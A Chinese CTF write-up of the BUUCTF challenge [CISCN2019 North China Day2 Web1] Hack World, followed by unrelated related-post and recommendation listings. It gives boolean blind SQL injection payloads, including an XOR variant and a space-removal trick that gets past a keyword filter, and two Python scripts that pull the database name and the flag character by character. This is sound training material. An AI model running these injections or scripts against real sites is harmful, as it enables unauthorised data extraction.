id=0

id=1

id=2

id=3





发现结果不一样,尝试 : ">4","=4","<4" : 




在自己的环境下验证一下:




爆一下数据库:




id=(ascii(substr(database(),1,1))>32)








'''

@Modify Time      @Author

------------      -------

2019/10/25 19:28   laoalo

'''

import requests

from lxml import etree

def a():

    url="http://6a93b089-ace7-4ece-8334-b10dd79ac360.node3.buuoj.cn/"

    flag="Hello, glzjin wants a girlfriend."

    final=""

    stop=0

    for i in range(1,129):

         print("*"*50,i,"*"*50)

         stop=0

         for j in range(32,129):

             stop = j

             data={"id":"(ascii(substr(database(),%d,1))=%d)" %(i,j)}

             # data={"id":"(ascii(substr((select flag from flag),%d,1))=%d)" %(i,j)}

             re = requests.post(url=url,data=data).text.replace('\n','')

             html = etree.HTML(re).xpath("//text()")

             print(">>",html)

             if flag in html:

                  final+=chr(j)

                  print("\n\t\t\t\t",final)

                  break

         if stop >= 128:

            print("*"*50,"结束")

            print(">>",final)

            break

if __name__ == '__main__':

       a()








过滤如何处理:


在爆flag的时候发现有过滤 :select,show,""……很是难受,后来在师傅的博客上看到了这种方法:




id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))






1^1=0 ,0^0=0 ,0^1=1


1^1^1=1, 1^1^0=0
构造payload:1^ascii(mid(database(),1,1)=98)^0


注意这里会多加一个^0或1是因为在盲注的时候可能出现了语法错误也无法判断,而改变这里的0或1,如果返回的结果是不同的,那就可以证明语法是没有问题的


其实不用抑或也行:




id=(ascii(substr((select(flag)from(flag)),1,1))<128)






居然去掉空格就成功绕过了Orz,这个方法要学习一下,这里贴一下我的脚本,没有用二分十分简单的枚举:




'''

@Modify Time      @Author

------------      -------

2019/10/25 19:28   laoalo

'''

import requests

from lxml import etree

def a():

    url="http://6a93b089-ace7-4ece-8334-b10dd79ac360.node3.buuoj.cn/"

    flag="Hello, glzjin wants a girlfriend."

    final=""

    stop=0

    for i in range(1,1290):

         print("*"*50,i,"*"*50)

         stop=0

         for j in range(32,129):

             stop = j

             data={"id":"1^(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))" %(i,j)}

             re = requests.post(url=url,data=data).text.replace('\n','')

             html = etree.HTML(re).xpath("//text()")

             # print(">>",html)

             if flag in html:

                  final+=chr(j)

                  print("\n\t\t\t\t",final)

                  break

         if stop >= 128:

            print("*"*50,"结束")

            print(">>",final)

            break

if __name__ == '__main__':

       a()








参考资料:


SQL注入学习总结(八):其他SQL注入的异或注入:https://blog.csdn.net/weixin_30740295/article/details/96833688




buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World:https://blog.csdn.net/weixin_43345082/article/details/99062970


												


											
BUUCTF | [CISCN2019 华北赛区 Day2 Web1]Hack World的更多相关文章
	

    
								
  1. 刷题记录:[CISCN2019 华北赛区 Day2 Web1]Hack World
		
    目录 刷题记录:[CISCN2019 华北赛区 Day2 Web1]Hack World 一.前言 二.正文 1.解题过程 2.解题方法 刷题记录:[CISCN2019 华北赛区 Day2 Web1] ...
    
		
    2. 
						
  2. [CISCN2019 华北赛区 Day2 Web1]Hack World
		
    知识点:题目已经告知列名和表明为flag,接下来利用ascii和substr函数即可进行bool盲注 eg: id=(ascii(substr((select(flag)from(flag)),1,1 ...
    
		
    3. 
						
  3. BUUOJ [CISCN2019 华北赛区 Day2 Web1]Hack World
		
    补一下这道题,顺便发篇博客 不知道今年国赛是什么时候,菜鸡还是来刷刷题好了 0X01 考点 SQL注入.盲注.数字型 0X02自己尝试 尝试输入1 赵师傅需要女朋友吗???随便都能有好吧 输入2 ?? ...
    
		
    4. 
						
  4. 刷题[CISCN2019 华北赛区 Day2 Web1]Hack World
		
    解题思路 打开发现是很简单的页面,告诉了表名和列名,只需知道字段即可 尝试一下,输入1,2都有内容,后面无内容.输入1'让他报错,发现返回bool(false) 大概思路就是布尔型注入了,通过不断返回 ...
    
		
    5. 
						
  5. [CISCN2019 华北赛区 Day2 Web1]Hack World 1详解
		
    打开题目, 我们开始尝试注入, 输入0回显Error Occured When Fetch Result. 输入1回显Hello, glzjin wants a girlfriend. 输入2回显Do ...
    
		
    6. 
						
  6. [CISCN2019 华北赛区 Day2 Web1]Hack World(二分法写布尔注入脚本)
		
    记一道布尔注入的题,存在过滤字符. 从题目看应该是一道注入题.提示存在flag表flag列. 输入1和2的返回结果不一样,可能是布尔注入. 简单用万能密码尝试了一下.提示SQL Injection C ...
    
		
    7. 
						
  7. BUUCTF | [CISCN2019 华北赛区 Day1 Web1]Dropbox
		
    步骤: 1.运行这个: <?php class User { public $db; } class File { public $filename; } class FileList { pr ...
    
		
    8. 
						
  8. 刷题记录:[CISCN2019 华北赛区 Day1 Web1]Dropbox
		
    目录 刷题记录:[CISCN2019 华北赛区 Day1 Web1]Dropbox 一.涉及知识点 1.任意文件下载 2.PHAR反序列化RCE 二.解题方法 刷题记录:[CISCN2019 华北赛区 ...
    
		
    9. 
						
  9. PHAR伪协议&&[CISCN2019 华北赛区 Day1 Web1]Dropbox
		
    PHAR:// PHP文件操作允许使用各种URL协议去访问文件路径:如data://,php://,等等 include('php://filter/read=convert.base64-encod ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. oracle blob  反序列化错误
			
    代码的目的是先将一个配置类JobConfig序列化存进Oracle中的Blob中,然后查的时候反序列化出来. 先看一下控制台报错 ### Cause: com.audaque.lib.core.exc ...
    
			
    2. 
						
  2. 云计算openstack共享组件——Memcache 缓存系统
			
    一.缓存系统 静态web页面: 1.工作流程: 在静态Web程序中,客户端使用Web浏览器(IE.FireFox等)经过网络(Network)连接到服务器上,使用HTTP协议发起一个请求(Reques ...
    
			
    3. 
						
  3. Jenkins持续集成_02_添加python项目&设置定时任务
			
    前言 自动化测试脚本编写后,最终目的都是持续集.持续集成可以实现一天多次部署运行自动化脚本,对功能进行不断监控测试.由于小编使用python编写的自动化脚本,这里仅讲解下如何在Jenkins中添加py ...
    
			
    4. 
						
  4. 排序算法五:随机化快速排序(Randomized quicksort)
			
    上一篇提到,快速排序的平均时间复杂度是O(nlgn),比其他相同时间复杂度的堆排序.归并排序都要快,但这是有前提的,就是假定要排序的序列是随机分布的,而不是有序的.实际上,对于已经排好的序列,如果用快 ...
    
			
    5. 
						
  5. python读取ini文件时,特殊字符的读取
			
    前言: 使用python在读取配置文件时,由于配置文件中存在特殊字符,读取时出现了以下错误: configparser.InterpolationSyntaxError: '%' must be fo ...
    
			
    6. 
						
  6. Day5---Python的random库
			
    random库 1.random库是随机数的Python标准库   2.原理 : random生成的伪随机数,而采用梅森旋转算法生成的(伪)随机序列中的元素叫做伪随机数 https://liam.pa ...
    
			
    7. 
						
  7. activity 生命周期 http://stackoverflow.com/questions/8515936/android-activity-life-cycle-what-are-all-these-methods-for
			
    331down voteaccepted See it in Activity Lifecycle (at Android Developers). onCreate(): Called when t ...
    
			
    8. 
						
  8. redis 命令大全
			
    全局命令: 1.查看所有键:keys * 2.键总数:dbsize 3.检查键是否存在:exists key 4.删除键:del key [key ...] 5.键过期:expire key seco ...
    
			
    9. 
						
  9. R语言子集
			
    取子集方法 x[]:适用于所有r语言 x[[ ]]:适用于list或者data.frame中提取元素 x$:使用元素名做索引,提取list或者data.frame中的某个元素 注意,取出的子集数据类型 ...
    
			
    10. 
						
  10. Linux之scp命令的使用
			
    Linux之scp命令的使用 1. scp简介 1.1 命令功能: scp是 secure copy的缩写, scp是linux系统下基于ssh登陆进行安全的远程文件拷贝命令.linux的scp命令可 ...
    
			
    11.